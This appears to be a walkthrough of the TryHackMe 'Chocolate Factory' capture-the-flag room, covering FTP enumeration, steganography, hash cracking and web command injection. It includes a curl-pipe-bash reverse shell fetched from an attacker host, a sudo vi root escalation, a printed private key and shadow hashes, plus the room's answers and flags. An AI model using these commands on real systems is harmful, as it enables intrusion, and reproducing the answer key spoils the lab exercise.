In this walk through, we will be going through the Chocolate Factory room from Tryhackme. This is an easy rated room on the platform, it covers basic service exploitation, stegnography, input validation bypassing and some privilege escalation stuff. Overall this was a fun room to work with, So on that note, let’s get started.
Machine Info:
Title | ChocolateFactory |
IPaddress | 10.10.96.23 |
Difficulty | Easy |
Objective | This room was designed so that hackers can revisit the Willy Wonka’s Chocolate Factory and meet Oompa Loompa |
Phase 1 – Enumeration
- Checking if machine is live or not.
- Let us start with an nmap scan using the half open scan and service version detection. The scan will take some time and the results will give us three major open ports – 21 (FTP), 22 (SSH) and 80 (HTTP).
wh1terose@fsociety:~$ sudo nmap -sS -sV 10.10.96.23 Nmap scan report for 10.10.96.23 Host is up (0.24s latency). Not shown: 988 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 53/tcp filtered domain 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 100/tcp open newacct? 106/tcp open pop3pw? 109/tcp open pop2? 110/tcp open pop3? 111/tcp open rpcbind? 113/tcp open ident? 119/tcp open nntp? 125/tcp open locus-map? Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 184.65 seconds
- Next, I tried anonymous login into the FTP server on port 21. Found one, accessing the server gives us a image named gum_room.jpg. I downloaded it for further analysis.
wh1terose@fsociety:~$ ftp 10.10.96.23 Connected to 10.10.96.23. 220 (vsFTPd 3.0.3) Name (10.10.96.23:wh1terose): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-rw-r-- 1 1000 1000 208838 Sep 30 2020 gum_room.jpg 226 Directory send OK. ftp> get gum_room.jpg local: gum_room.jpg remote: gum_room.jpg 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for gum_room.jpg (208838 bytes). 226 Transfer complete. 208838 bytes received in 0.84 secs (243.8747 kB/s) ftp> exit 221 Goodbye.
- Further i use steghide to extract the text file inside in the image. The text file gives me a base64 encoded string.
wh1terose@fsociety:~/CTF/TryHackme/Chocolate Factory$ steghide --extract -sf gum_room.jpg Enter passphrase: wrote extracted data to "b64.txt". wh1terose@fsociety:~/CTF/TryHackme/Chocolate Factory$ ls b64.txt gum_room.jpg wh1terose@fsociety:~/CTF/TryHackme/Chocolate Factory$ cat b64.txt ZGFlbW9uOio6MTgzODA6MDo5OTk5OTo3Ojo6CmJpbjoqOjE4MzgwOjA6OTk5OTk6Nzo6OgpzeXM6 KjoxODM4MDowOjk5OTk5Ojc6OjoKc3luYzoqOjE4MzgwOjA6OTk5OTk6Nzo6OgpnYW1lczoqOjE4 MzgwOjA6OTk5OTk6Nzo6OgptYW46KjoxODM4MDowOjk5OTk5Ojc6OjoKbHA6KjoxODM4MDowOjk5 OTk5Ojc6OjoKbWFpbDoqOjE4MzgwOjA6OTk5OTk6Nzo6OgpuZXdzOio6MTgzODA6MDo5OTk5OTo3 Ojo6CnV1Y3A6KjoxODM4MDowOjk5OTk5Ojc6OjoKcHJveHk6KjoxODM4MDowOjk5OTk5Ojc6OjoK d3d3LWRhdGE6KjoxODM4MDowOjk5OTk5Ojc6OjoKYmFja3VwOio6MTgzODA6MDo5OTk5OTo3Ojo6 Cmxpc3Q6KjoxODM4MDowOjk5OTk5Ojc6OjoKaXJjOio6MTgzODA6MDo5OTk5OTo3Ojo6CmduYXRz Oio6MTgzODA6MDo5OTk5OTo3Ojo6Cm5vYm9keToqOjE4MzgwOjA6OTk5OTk6Nzo6OgpzeXN0ZW1k LXRpbWVzeW5jOio6MTgzODA6MDo5OTk5OTo3Ojo6CnN5c3RlbWQtbmV0d29yazoqOjE4MzgwOjA6 OTk5OTk6Nzo6OgpzeXN0ZW1kLXJlc29sdmU6KjoxODM4MDowOjk5OTk5Ojc6OjoKX2FwdDoqOjE4 MzgwOjA6OTk5OTk6Nzo6OgpteXNxbDohOjE4MzgyOjA6OTk5OTk6Nzo6Ogp0c3M6KjoxODM4Mjow Ojk5OTk5Ojc6OjoKc2hlbGxpbmFib3g6KjoxODM4MjowOjk5OTk5Ojc6OjoKc3Ryb25nc3dhbjoq OjE4MzgyOjA6OTk5OTk6Nzo6OgpudHA6KjoxODM4MjowOjk5OTk5Ojc6OjoKbWVzc2FnZWJ1czoq OjE4MzgyOjA6OTk5OTk6Nzo6OgphcnB3YXRjaDohOjE4MzgyOjA6OTk5OTk6Nzo6OgpEZWJpYW4t ZXhpbTohOjE4MzgyOjA6OTk5OTk6Nzo6Ogp1dWlkZDoqOjE4MzgyOjA6OTk5OTk6Nzo6OgpkZWJp YW4tdG9yOio6MTgzODI6MDo5OTk5OTo3Ojo6CnJlZHNvY2tzOiE6MTgzODI6MDo5OTk5OTo3Ojo6 CmZyZWVyYWQ6KjoxODM4MjowOjk5OTk5Ojc6OjoKaW9kaW5lOio6MTgzODI6MDo5OTk5OTo3Ojo6 CnRjcGR1bXA6KjoxODM4MjowOjk5OTk5Ojc6OjoKbWlyZWRvOio6MTgzODI6MDo5OTk5OTo3Ojo6 CmRuc21hc3E6KjoxODM4MjowOjk5OTk5Ojc6OjoKcmVkaXM6KjoxODM4MjowOjk5OTk5Ojc6OjoK dXNibXV4Oio6MTgzODI6MDo5OTk5OTo3Ojo6CnJ0a2l0Oio6MTgzODI6MDo5OTk5OTo3Ojo6CnNz aGQ6KjoxODM4MjowOjk5OTk5Ojc6OjoKcG9zdGdyZXM6KjoxODM4MjowOjk5OTk5Ojc6OjoKYXZh aGk6KjoxODM4MjowOjk5OTk5Ojc6OjoKc3R1bm5lbDQ6IToxODM4MjowOjk5OTk5Ojc6OjoKc3Ns aDohOjE4MzgyOjA6OTk5OTk6Nzo6OgpubS1vcGVudnBuOio6MTgzODI6MDo5OTk5OTo3Ojo6Cm5t LW9wZW5jb25uZWN0Oio6MTgzODI6MDo5OTk5OTo3Ojo6CnB1bHNlOio6MTgzODI6MDo5OTk5OTo3 Ojo6CnNhbmVkOio6MTgzODI6MDo5OTk5OTo3Ojo6CmluZXRzaW06KjoxODM4MjowOjk5OTk5Ojc6 OjoKY29sb3JkOio6MTgzODI6MDo5OTk5OTo3Ojo6CmkycHN2YzoqOjE4MzgyOjA6OTk5OTk6Nzo6 OgpkcmFkaXM6KjoxODM4MjowOjk5OTk5Ojc6OjoKYmVlZi14c3M6KjoxODM4MjowOjk5OTk5Ojc6 OjoKZ2VvY2x1ZToqOjE4MzgyOjA6OTk5OTk6Nzo6OgpsaWdodGRtOio6MTgzODI6MDo5OTk5OTo3 Ojo6CmtpbmctcGhpc2hlcjoqOjE4MzgyOjA6OTk5OTk6Nzo6OgpzeXN0ZW1kLWNvcmVkdW1wOiEh OjE4Mzk2Ojo6Ojo6Cl9ycGM6KjoxODQ1MTowOjk5OTk5Ojc6OjoKc3RhdGQ6KjoxODQ1MTowOjk5 OTk5Ojc6OjoKX2d2bToqOjE4NDk2OjA6OTk5OTk6Nzo6OgpjaGFybGllOiQ2JENaSm5DUGVRV3A5 L2pwTngka2hHbEZkSUNKbnI4UjNKQy9qVFIycjdEcmJGTHA4enE4NDY5ZDNjMC56dUtONHNlNjFG T2J3V0d4Y0hacU8yUkpIa2tMMWpqUFllZUd5SUpXRTgyWC86MTg1MzU6MDo5OTk5OTo3Ojo6Cg== wh1terose@fsociety:~/CTF/TryHackme/Chocolate Factory$
- I use cyberchef to decode the string. It gives me the password hash of the user charlie.
daemon:*:18380:0:99999:7::: bin:*:18380:0:99999:7::: sys:*:18380:0:99999:7::: sync:*:18380:0:99999:7::: games:*:18380:0:99999:7::: man:*:18380:0:99999:7::: lp:*:18380:0:99999:7::: mail:*:18380:0:99999:7::: news:*:18380:0:99999:7::: uucp:*:18380:0:99999:7::: proxy:*:18380:0:99999:7::: www-data:*:18380:0:99999:7::: backup:*:18380:0:99999:7::: list:*:18380:0:99999:7::: irc:*:18380:0:99999:7::: gnats:*:18380:0:99999:7::: nobody:*:18380:0:99999:7::: systemd-timesync:*:18380:0:99999:7::: systemd-network:*:18380:0:99999:7::: systemd-resolve:*:18380:0:99999:7::: _apt:*:18380:0:99999:7::: mysql:!:18382:0:99999:7::: tss:*:18382:0:99999:7::: shellinabox:*:18382:0:99999:7::: strongswan:*:18382:0:99999:7::: ntp:*:18382:0:99999:7::: messagebus:*:18382:0:99999:7::: arpwatch:!:18382:0:99999:7::: Debian-exim:!:18382:0:99999:7::: uuidd:*:18382:0:99999:7::: debian-tor:*:18382:0:99999:7::: redsocks:!:18382:0:99999:7::: freerad:*:18382:0:99999:7::: iodine:*:18382:0:99999:7::: tcpdump:*:18382:0:99999:7::: miredo:*:18382:0:99999:7::: dnsmasq:*:18382:0:99999:7::: redis:*:18382:0:99999:7::: usbmux:*:18382:0:99999:7::: rtkit:*:18382:0:99999:7::: sshd:*:18382:0:99999:7::: postgres:*:18382:0:99999:7::: avahi:*:18382:0:99999:7::: stunnel4:!:18382:0:99999:7::: sslh:!:18382:0:99999:7::: nm-openvpn:*:18382:0:99999:7::: nm-openconnect:*:18382:0:99999:7::: pulse:*:18382:0:99999:7::: saned:*:18382:0:99999:7::: inetsim:*:18382:0:99999:7::: colord:*:18382:0:99999:7::: i2psvc:*:18382:0:99999:7::: dradis:*:18382:0:99999:7::: beef-xss:*:18382:0:99999:7::: geoclue:*:18382:0:99999:7::: lightdm:*:18382:0:99999:7::: king-phisher:*:18382:0:99999:7::: systemd-coredump:!!:18396:::::: _rpc:*:18451:0:99999:7::: statd:*:18451:0:99999:7::: _gvm:*:18496:0:99999:7::: charlie:$6$CZJnCPeQWp9/jpNx$khGlFdICJnr8R3JC/jTR2r7DrbFLp8zq8469d3c0.zuKN4se61FObwWGxcHZqO2RJHkkL1jjPYeeGyIJWE82X/:18535:0:99999:7:::
- Used hashes.com to crack the password of user charlie. The charlie’s password is – cn7824
Phase 2 – Initial Access
- Moving now on the web front. we have an application which expects a user & password combination. We used the earlier found password for user charlie in here.
- The web portal gives a command field which can execute commands in underlying operating system. I used curl command to execute a reverse shell which i saved i text file by piping into a bash shell. You can find the reverse shell here.
#Use this one-liner to get a reverse shell curl http://10.18.11.103:8000/shell.sh | bash #Setting up a netcat listener nc -lvnp 4444
- Browsing through the file system, i found SSH private and public keys for user charlie. I downloaded the private key for the same to my local machine.
www-data@chocolate-factory:/home/charlie$ ls -l ls -l total 12 -rw-r--r-- 1 charlie charley 1675 Oct 6 2020 teleport -rw-r--r-- 1 charlie charley 407 Oct 6 2020 teleport.pub -rw-r----- 1 charlie charley 39 Oct 6 2020 user.txt www-data@chocolate-factory:/home/charlie$ cat teleport.pub cat teleport.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDhp2s9zdSH3xFgOtnwJQEOBYsQ1TJsXrSUyT1hA4ENH6Cm5FbUDMvXYrfn8yLdXC2nQ1LCaVLuFrjL2y/aQ9e/yUU6YuLUVXaGqVA8vD+6ecQXBRsvgoGoF6YgN59XmnEyYKqqC4lciTOSUAhc1iF/EuvxwFL8cmiH/uqYuqsOhc2HBiMHfOCi/tFS2TXkm/XUPQi2zKvnim9iEJCB2iitTuXjYRklrIiiYcqifWOSh93X+hh84HCDPok6U0fWMUmjIhmDY6YSGdKNSW1n2ZLOZDK/czgA5FCjdl4tv7NudInJwQRFo5s+VvR1HLcqg3v2W352H6NKD90z9Nhh7kvj charlie@chocolate-factory www-data@chocolate-factory:/home/charlie$ cat teleport cat teleport -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEA4adrPc3Uh98RYDrZ8CUBDgWLENUybF60lMk9YQOBDR+gpuRW 1AzL12K35/Mi3Vwtp0NSwmlS7ha4y9sv2kPXv8lFOmLi1FV2hqlQPLw/unnEFwUb L4KBqBemIDefV5pxMmCqqguJXIkzklAIXNYhfxLr8cBS/HJoh/7qmLqrDoXNhwYj B3zgov7RUtk15Jv11D0Itsyr54pvYhCQgdoorU7l42EZJayIomHKon1jkofd1/oY fOBwgz6JOlNH1jFJoyIZg2OmEhnSjUltZ9mSzmQyv3M4AORQo3ZeLb+zbnSJycEE RaObPlb0dRy3KoN79lt+dh+jSg/dM/TYYe5L4wIDAQABAoIBAD2TzjQDYyfgu4Ej Di32Kx+Ea7qgMy5XebfQYquCpUjLhK+GSBt9knKoQb9OHgmCCgNG3+Klkzfdg3g9 zAUn1kxDxFx2d6ex2rJMqdSpGkrsx5HwlsaUOoWATpkkFJt3TcSNlITquQVDe4tF w8JxvJpMs445CWxSXCwgaCxdZCiF33C0CtVw6zvOdF6MoOimVZf36UkXI2FmdZFl kR7MGsagAwRn1moCvQ7lNpYcqDDNf6jKnx5Sk83R5bVAAjV6ktZ9uEN8NItM/ppZ j4PM6/IIPw2jQ8WzUoi/JG7aXJnBE4bm53qo2B4oVu3PihZ7tKkLZq3Oclrrkbn2 EY0ndcECgYEA/29MMD3FEYcMCy+KQfEU2h9manqQmRMDDaBHkajq20KvGvnT1U/T RcbPNBaQMoSj6YrVhvgy3xtEdEHHBJO5qnq8TsLaSovQZxDifaGTaLaWgswc0biF uAKE2uKcpVCTSewbJyNewwTljhV9mMyn/piAtRlGXkzeyZ9/muZdtesCgYEA4idA KuEj2FE7M+MM/+ZeiZvLjKSNbiYYUPuDcsoWYxQCp0q8HmtjyAQizKo6DlXIPCCQ RZSvmU1T3nk9MoTgDjkNO1xxbF2N7ihnBkHjOffod+zkNQbvzIDa4Q2owpeHZL19 znQV98mrRaYDb5YsaEj0YoKfb8xhZJPyEb+v6+kCgYAZwE+vAVsvtCyrqARJN5PB la7Oh0Kym+8P3Zu5fI0Iw8VBc/Q+KgkDnNJgzvGElkisD7oNHFKMmYQiMEtvE7GB FVSMoCo/n67H5TTgM3zX7qhn0UoKfo7EiUR5iKUAKYpfxnTKUk+IW6ME2vfJgsBg 82DuYPjuItPHAdRselLyNwKBgH77Rv5Ml9HYGoPR0vTEpwRhI/N+WaMlZLXj4zTK 37MWAz9nqSTza31dRSTh1+NAq0OHjTpkeAx97L+YF5KMJToXMqTIDS+pgA3fRamv ySQ9XJwpuSFFGdQb7co73ywT5QPdmgwYBlWxOKfMxVUcXybW/9FoQpmFipHsuBjb Jq4xAoGBAIQnMPLpKqBk/ZV+HXmdJYSrf2MACWwL4pQO9bQUeta0rZA6iQwvLrkM Qxg3lN2/1dnebKK5lEd2qFP1WLQUJqypo5TznXQ7tv0Uuw7o0cy5XNMFVwn/BqQm G2QwOAGbsQHcI0P19XgHTOB7Dm69rP9j1wIRBOF7iGfwhWdi+vln -----END RSA PRIVATE KEY-----
- Next change the permissions of the private key and used it to login into the SSH server, thus getting the user flag.
wh1terose@fsociety:~/CTF/TryHackme/Chocolate Factory$ chmod 600 id_rsa wh1terose@fsociety:~/CTF/TryHackme/Chocolate Factory$ ssh -i id_rsa [email protected] Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-115-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Tue May 30 17:38:36 UTC 2023 System load: 0.08 Processes: 605 Usage of /: 43.7% of 8.79GB Users logged in: 0 Memory usage: 63% IP address for eth0: 10.10.96.23 Swap usage: 0% 0 packages can be updated. 0 updates are security updates. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Wed Oct 7 16:10:44 2020 from 10.0.2.5 Could not chdir to home directory /home/charley: No such file or directory To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. charlie@chocolate-factory:/$
Phase 3 – Privilege Escalation
- For escalating our privileges, i first tried to find sudo misconfiguration and i found one with vi binary which can be executed as root. Next, i used GTFObins to leverage this and got my root shell.
charlie@chocolate-factory:/home/charlie$ sudo -l Matching Defaults entries for charlie on chocolate-factory: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User charlie may run the following commands on chocolate-factory: (ALL : !root) NOPASSWD: /usr/bin/vi charlie@chocolate-factory:/home/charlie$ sudo vi -c ':!/bin/sh' /dev/null # id uid=0(root) gid=0(root) groups=0(root) # whoami root #
- In order to get the root flag, we have to provide a key to the variable in root.py file.
# cd /root # ls root.py # cat root.py from cryptography.fernet import Fernet import pyfiglet key=input("Enter the key: ") f=Fernet(key) encrypted_mess= 'gAAAAABfdb52eejIlEaE9ttPY8ckMMfHTIw5lamAWMy8yEdGPhnm9_H_yQikhR-bPy09-NVQn8lF_PDXyTo-T7CpmrFfoVRWzlm0OffAsUM7KIO_xbIQkQojwf_unpPAAKyJQDHNvQaJ' dcrypt_mess=f.decrypt(encrypted_mess) mess=dcrypt_mess.decode() display1=pyfiglet.figlet_format("You Are Now The Owner Of ") display2=pyfiglet.figlet_format("Chocolate Factory ") print(display1) print(display2) print(mess)#
- To find the key, i browsed around the file system once again in my old shell and found the “Key” in the key_rev_key file using strings.
www-data@chocolate-factory:/var/www/html$ strings key_rev_key strings key_rev_key /lib64/ld-linux-x86-64.so.2 libc.so.6 __isoc99_scanf puts __stack_chk_fail printf __cxa_finalize strcmp __libc_start_main GLIBC_2.7 GLIBC_2.4 GLIBC_2.2.5 _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable 5j %l %j %b %Z %R %J %b =9 AWAVI AUATL []A\A]A^A_ Enter your name: laksdhfas congratulations you have found the key: b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY=' Keep its safe Bad name! ;*3$" GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0 crtstuff.c deregister_tm_clones __do_global_dtors_aux completed.7698 __do_global_dtors_aux_fini_array_entry frame_dummy __frame_dummy_init_array_entry license.c __FRAME_END__ __init_array_end _DYNAMIC __init_array_start __GNU_EH_FRAME_HDR _GLOBAL_OFFSET_TABLE_ __libc_csu_fini _ITM_deregisterTMCloneTable puts@@GLIBC_2.2.5 _edata __stack_chk_fail@@GLIBC_2.4 printf@@GLIBC_2.2.5 __libc_start_main@@GLIBC_2.2.5 __data_start strcmp@@GLIBC_2.2.5 __gmon_start__ __dso_handle _IO_stdin_used __libc_csu_init __bss_start main __isoc99_scanf@@GLIBC_2.7 __TMC_END__ _ITM_registerTMCloneTable __cxa_finalize@@GLIBC_2.2.5 .symtab .strtab .shstrtab .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .dynamic .data .bss .comment www-data@chocolate-factory:/var/www/html$
- Finally got the root flag by passing “Key” into the program.
b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
# python root.py Enter the key: b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY=' __ __ _ _ _ _____ _ \ \ / /__ _ _ / \ _ __ ___ | \ | | _____ __ |_ _| |__ ___ \ V / _ \| | | | / _ \ | '__/ _ \ | \| |/ _ \ \ /\ / / | | | '_ \ / _ \ | | (_) | |_| | / ___ \| | | __/ | |\ | (_) \ V V / | | | | | | __/ |_|\___/ \__,_| /_/ \_\_| \___| |_| \_|\___/ \_/\_/ |_| |_| |_|\___| ___ ___ __ / _ \__ ___ __ ___ _ __ / _ \ / _| | | | \ \ /\ / / '_ \ / _ \ '__| | | | | |_ | |_| |\ V V /| | | | __/ | | |_| | _| \___/ \_/\_/ |_| |_|\___|_| \___/|_| ____ _ _ _ / ___| |__ ___ ___ ___ | | __ _| |_ ___ | | | '_ \ / _ \ / __/ _ \| |/ _` | __/ _ \ | |___| | | | (_) | (_| (_) | | (_| | || __/ \____|_| |_|\___/ \___\___/|_|\__,_|\__\___| _____ _ | ___|_ _ ___| |_ ___ _ __ _ _ | |_ / _` |/ __| __/ _ \| '__| | | | | _| (_| | (__| || (_) | | | |_| | |_| \__,_|\___|\__\___/|_| \__, | |___/ flag{cec59161d338fef787fcb4e296b42124} #
Task 1 – Introduction
Task 2 – Challenges
Question 1 – Enter the key you found!
b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
Question 2 – What is Charlie’s password?
cn7824
Question 3 – change user to charlie
Done
Question 4 – Enter the user flag
flag{cd5509042371b34e4826e4838b522d2e}
Question 5 – Enter the root flag
flag{cec59161d338fef787fcb4e296b42124}
Also Read: Tryhackme – Burpsuite: Repeater
Conclusion:
So that was “Chocolate Factory” for you. Let’s summarize it quickly, first we started with a regular nmap scan, found the common services running – FTP, SSH, HTTP. We started with the ftp by logging in as an anonymous user. There we found an image file which we downloaded to our local machine for further analysis. Used steghide on it to extract a text file namely b64.txt. The file contains a base encoded string which when decoded by cyberchef reveals contents /etc/shadow file. Next, we used hashes.com to crack the hash we found in the file for user charlie. With the cracked password, we log into the web portal which has a command execution field, there we use a bash reverse shell and executed it with the help of curl. With our first shell into the target, navigating to the user home directory reveals SSH keys which we then used to get shell via SSH as user charlie. To escalate the privileges, the vi binary was exploited using GTFObins. Further, for getting the root flag, we have to pass a “key” to root.py file. The key can be revealed by looking for strings in key_rev_key binary. Passing the key from the binary to root.py gives us the root flag and me the divorce papers from my beloved wife.